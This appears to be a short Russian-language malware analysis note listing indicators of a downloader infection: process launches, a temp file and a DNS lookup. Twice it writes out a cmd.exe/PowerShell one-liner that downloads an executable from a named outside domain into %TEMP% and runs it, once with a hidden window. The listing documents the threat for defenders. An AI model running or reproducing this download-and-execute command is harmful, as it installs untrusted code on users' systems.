Техническая информация
- http://dicfo.us/emeep.exe как %temp%\ostorojno.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://dicfo.us/emeEP.exe','%TEMP%\ostorojno.exe');Start-Process '%TEMP%\ostorojno.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1936
- %TEMP%\1152831.cvr
- DNS ASK di##o.us
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://dicfo.us/emeEP.exe','%TEMP%\ostorojno.exe');Start-Process '%TEMP%\ostorojno.exe';' (со скрытым окном)